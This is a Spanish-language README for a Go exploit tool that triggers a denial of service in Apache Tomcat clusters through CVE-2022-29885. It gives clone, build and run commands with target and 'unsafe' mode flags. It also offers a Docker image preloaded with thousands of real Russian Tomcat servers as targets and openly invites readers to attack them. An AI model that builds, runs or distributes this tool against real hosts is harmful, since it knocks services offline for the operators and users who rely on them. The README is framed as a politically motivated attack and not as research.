
Exploit de DoS de Apache Tomcat (CVE-2022-29885)
Exploit de DoS de Apache Tomcat (CVE-2022-29885).
Denegación de servicio en EncryptInterceptor (Tomcat Cluster).
La máquina objetivo necesita iniciar el Cluster Nio Receiver.
El envío de un paquete TCP especial provocará una denegación de servicio en el objetivo.
Se utilice o no EncryptInterceptor, existe la posibilidad de una vulnerabilidad de denegación de servicio bajo la condición:
la función de clúster de Tomcat está habilitada y se utiliza NioReceiver para la comunicación.
Cualquier versión de Tomcat se verá afectada. La única solución es usar una red de confianza.
El archivo de configuración seguro server.xml contiene
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
Cualquier otra variación de configuración no es segura.
Aplicación
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - target URL or filename
- d - debug {true, false} flag which enables or disables logs
- s - safe and unsafe regime switcher. Default value is unsafe.
Docker con 6340 servidores Apache Tomcat ruzzian predefinidos, multiplicados por los 10 puertos de Tomcat más comunes.
El modo Unsafe predeterminado está preconfigurado.
docker run -d masterroot/cve-2022-29885
Diviértete con los dispositivos VoIP de ruzzland-terrorist-state :D

Eres libre de contactarme a través de Keybase para cualquier detalle.